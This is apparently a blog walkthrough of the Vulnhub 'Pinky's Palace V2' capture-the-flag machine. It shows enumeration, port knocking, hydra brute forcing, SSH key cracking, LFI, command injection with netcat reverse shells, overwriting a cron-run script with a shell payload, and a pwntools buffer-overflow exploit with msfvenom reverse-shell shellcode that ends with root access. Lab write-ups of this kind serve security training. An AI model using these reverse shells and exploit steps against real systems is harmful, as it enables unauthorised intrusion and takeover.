Pinky's Palace V2

Posted on

Vulnhub virtual machine; How bad do you want OSCP box, Lets begin with this is not for the faint of heart. Enumeration to multiple pivots, reverse engineering, buffer overflow all wrapped in to one VM. This box will teach you something new guaranteed, grab a drink you’re going to need one.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.

Vulnhub Link: https://www.vulnhub.com/entry/pinkys-palace-v2,229/ File: Pinkys-Palace2.zip (Size: 1.1 GB)

Only use with VMware

Discover VM on network:

1
netdiscover -r 192.168.213.0/24

Pinky’s VM shows IP address as well.

Target: 192.168.213.129

Enumeration

Nmap Scan

1
nmap -sV -sC oA nmap/pinkyv2 192.168.213.129

UDP Scan with unicorn:

1
unicornscan -i eth0 -mU 192.168.213.129 -v

Looking at what to be a wordpress site based off the enumeration which could lead to a wpscan.

Download robots.txt

1
curl -i http://192.168.213.129/robots.txt

no robots.txt to look at

Change host name in /etc/hosts

1
192.168.213.129 pinkydb

Navigating to web-server:

wpscan

1
wpscan --url http://pinkydb/ -u -e ap --log wpscan.out

wfuzz - directory scan

1
wfuzz -w /usr/share/seclists/Discovery/Web-Content/big.txt --hc 404 http://pinkydb/FUZZ

navigating to /secret and discovered bambam.txt

cat bambam.txt

This could ellude to a port knocking of sort…

Port Knocking Script:

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash

TARGET=$1

for ports in $(cat permutation.txt); do
    echo "[*] Trying sequence $ports..."
    for p in $(echo $ports | tr ',' ' '); do
        nmap -n -v0 -Pn --max-retries 0 -p $p $TARGET
    done
    sleep 3
    nmap -n -v -Pn -p- -A --reason $TARGET -oN ${ports}.txt
done

next we need to create this permutation list which will contain the port numbers mixed up. To do this a python script will be used to iterate the port numbers.

1
2
python -c 'import itertools; print list(itertools.permutations([8890,7000,666]))' | sed 's/), /\n/g' | tr -cd '0-
9,\n' | sort | uniq > permutation.txt

launch the knock.sh script with the target ip as an argument.

1
./knock.sh 192.168.213.129

discover port 7654 running a web server and navigate to said server.

click to login.php

before we attempt to hydra this login page. We need to create a wordlist. To do so we can use cewl and john to sift through that list for duplicates.

creating word list from http://pinkydb

1
cewl -m3 pinkydb 2>/dev/null | sed 1d | tee cewl.txt

next use john

1
john --rules --wordlist=cewl.txt --stdout | tee wordlist.txt

now we have a wordlist.txt that we can use with hydra

create usernames from our wpscan username enumeration

Hydra login page - w/ wordlist.txt

1
hydra -L username.txt -P wordlist.txt pinkydb -s 7654 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid Username or Password" -vV

Discovered the following credentials:

1
2
3
\[7654\][http-post-form] host: pinkydb   login: pinky   password: Passione
\[7654\][http-post-form] host: pinkydb   login: pinky1337   password: Hello
\[7654\][http-post-form] host: pinkydb   login: pinkys   password: Pinky

Login webserver - pinky:Passione

Exploring Links:

download the ssh key locally and cat the file:

connecting to ssh server with private key - stefano@pinkydb

1
ssh -i id_rsa stefano@pinkydb -p 4655

Key is password encrypted and we need to perform some decryption before we can use.

Cracking the id_rsa with ssh2john. (for some reason my current version of ssh2john was not functioning but I did find an python version of the binary that functions the same off github. Link: https://github.com/koboi137/john/blob/master/ssh2john.py

error i was seeing:

run the conversion of private key to something we can use to crack:

1
python ssh2john.id_rsa

great, now just append it to a file with python ssh2john.py id_rsa > id_rsajohn

Crack converted private SSH key with john:

1
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsajohn

Bingo, bango we have the password for Stefano:secretz101

Notes:

LFI Test

based off the php - there looks to be LFI.

1
.php?1337=/etc/passwd

output:

we can also send a reverse shell from this inclusion to gain access to the box.

SSH as Stefano

1
ssh -i id_rsa stefano@pinkydb

we are now *stefano*

permissions check:

1
sudo -l

well, the low hanging fruit has be removed.

Priv-esc

Looking around ~/

qsub has a sticky bit which will allow us to run root commands. The binary has a message that i was left to communicate with Pinky. Just running the program it seems to ask for a password.

Lets attempt to crash the program with an excessive amount of “A”s

1
./qsub $(python -c "print 'A'*100")

“Bad hacker! Go away” - I think not!

Enter the gdb:

1
which gdb

confused john travolta GIF

gdb is not local…

with continued enumeration a quick check of the variable $TERM yielded “screen”

re-attemped the application with “screen” as the password.

A new message appears stating “Welcome to the Question Submit”. Might be the password might not be, but something changed.

Attempt a reverse shell injection

1
./qsub '$(nc -e /bin/bash 192.168.213.130 444)'

and we have a call back!

we are now the user pinky!

Spawn proper shell with python:

1
1
python -c "import pty;pty.spawn('/bin/bash')"

Investigate pinky home directory:

messages from qsub were being sent to messages directory.

Since there is no sudo we can have a look at what pinky is able to touch with find.

1
find / -user pinky

a lot of “permission denied” and nothing of use.

1
find / -group pinky

backup.sh discovered that we are able to take a loot at.

investigating the bash file

unfortunately we cannot open. Which is confusing because we are apart of the pinky group. But, after remember we upgraded from a SUID sticky bit the group list never updated.

updating the grouplist

1
newgrp

the gid has now successfully updated.

1
cat backup.sh

The file is executable and will execute at the group level so if we modify it to include another reverse shell we could achieve access of user.

Creating reverse shell via appending backup.sh - new listener setup on 5555

1
echo "nc -e /bin/bash 192.168.213.130 6666" > backup.sh

backup.sh has been overridden! - we know wait till the cronjob is executed.

Reverse connection received:

we are now operating as user *demon*

upgrade shell again with python:

1
1
python -c "import pty;pty.spawn('/bin/bash')"

Investigate the home directory:

nothing of immediate usefulness. Begin again enumerating again with find command.

1
find / -user demon

both directory /daemon and /daemon/panel worth investigating.

panel seems to be a binary with execute

1
file panel

after running panel I received a

1
2
3
4
demon@Pinkys-Palace:/daemon$ ./panel
....
[-] binding to socket
...

this repeated over and over as if its trying to connect to a port. Thinking back to our open port 31337 might have something to do with this. With no actual way to disassemble the binary remotely we need to send the file locally.

Base64 encode file before sending to local:

1
base64 panel > panelb64

Send file from Remote to Local: Local Kali:

1
nc -nlvp 1111 > panelb64

Remote System:

1
nc 192.168.213.130 1111 < panelb64

Decode Base64 panelb64

1
base64 -d panelb64 > panel

add chmod

1
chmod +x panel

Create SSH Foothold:

Add ssh key to box just to make sure we have an easy return if anything.

add ssh-rsa to /home/demon/.ssh/authorized_keys && chmod 600

Run panel locally and check netstat

1
2
3
./panel
----
netstat -alnp | grep panel

we indeed have panel executing a command to port 31337.

connect to local port with nc:

1
1
1
nc localhost 31337

Buffer Overflow - gdb peda

installing gdb-peta This is going to allow us to great patterns and offsets within gdb along with some functionality to create shellcode. github link: https://github.com/longld/peda

1
cd ~/ && git clone github link: https://github.com/longld/peda && cd~/peda && echo "source [git-location]/peda.py" >> ~/.gdbinit

Launching gdb-peda against ./panel

1
gdb ./panel

run binary with r

connect to port 31337 with nc

1
1
1
nc localhost 31337

python create A’s x200 with python

1
python -c 'print "A"*200'

send 200 “A”s to binary through the nc

as expected we get a SIGSEGV

we know this program has a handlecmd which is part of our vulnerability that we will need to take over our registers in that we can search for that and print a few lines of the function

search handlecmd

print a 50 lines of the function:

1
x/50i handlecmd

Catching/Understanding the crash:

set a breakpoint at 0x4009aa ret

1
b *0x4009aa

run binary again with r connect with nc and send “A”s to hit breakpoint on ret

gdb:

we experience a crash due to the fact that RBP and RSP have been filled with “A”s and the ret of the program will send us directly into the RSP.

continue with si to see the function push us to the RSP which creates a loop.

Next, we need to create a pattern

1
pattern_create 150

Re-attempt sending the binary on port 31337 except with our created pattern. -close gdb with q -kill handle process x2 && run gdb

1
pkill -9 panel; pkill -9 panel; gdb ./panel

run binary with r

connect to port 31337 with nc:

1
1
1
nc localhost 31337

send created pattern string:

1
2
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAo
AA

gdb - binary crashes with our pattern filling the registers

Finding the location of the RSP with pattern_offset location:

pattern_offset:

1
pattern_offset jAA9AAOAAkAAPAAlAAQAAmAARAAoAA

(note: don’t add the \n)

at this point we know that 120 bytes we overwrite the RSP (stack pointer)

Create Skeleton Buffer Overflow Exploit: requirements pwntools to install:

1
pip install pwn #or pip3 for python3

create exploit.py with editor of choice

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

HOST, PORT = "localhost", 31337

payload = ''
payload += 'A'*120
payload += 'BBBB0000'
payload += 'C'*30

r = remote(HOST, PORT)
r.recvuntil("=>")
r.sendline(payload)

q gdb && pkill panel && re-launch gdb && r to run the binary

execute exploit.py:

1
python exploit.py

gdb:

panel binary crashes and we now have control of the RSP to which this is the location we are going to insert our shellcode.

check for a jmpcall to see if there is a jmprsp

call rsp visualization:

Next, replace our exploit “BBBB0000” with the address to call rsp “0x400cfb”

we now need shellcode in our case we have 120 bytes to use:

Create shellcode with msfvenom: -types of x64 reverse shells with msfvenom -l

syntax to create shellcode:

1
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.213.130 LPORT=4444 -f py -b 00 -o revshell.shellcode

we have exactly 120 bytes of space to use and our shellcode we generated is 119 bytes.

adding + modifying exploit.py

Re-exploiting our binary by closing restarting process and sending our new exploit.

additional: if you require super small shellcode within 77 and 84bytes that can be achieved with zerosum0x0 script.

https://zerosum0x0.blogspot.com/2014/12/x64-linux-reverse-tcp-connect-shellcode.html

script located at github: https://github.com/zerosum0x0/SLAE64/blob/master/reverseshell/reverseshell.asm

download github repository usage: edit the reverseshell.asm and localip hex address in little endian format

navigate to reverseshell - cd reverseshell

1
python ../shellbuild.py -x 64 reverseshell/reverseshell.asm

output

and now we have 75 bytes of working shellcode!

Root&Loot

Re-run gdb panel + execute our newly modified exploit.py with an active listener on 4444.

a callback is made as root

Final Stretch - attacking our binary on the remote box change the “ip” on our script to “pinkydb”

setup listener

1
nc -lvnp 4444

Execute local kali:

listener:

upgrade our shell && loot

1
python -c 'import pty; pty.spawn("/bin/bash")'

and in the end the rollercoaster of emotions has ended with a victory!

song funk GIF

also, if you made it this far. I’m proud to say I am the new owner of rootandloot.com! have any ideas for the site? drop them in the comments or find me on twitter @executeatwill

#HAILippSec

“bring me the root” -Exec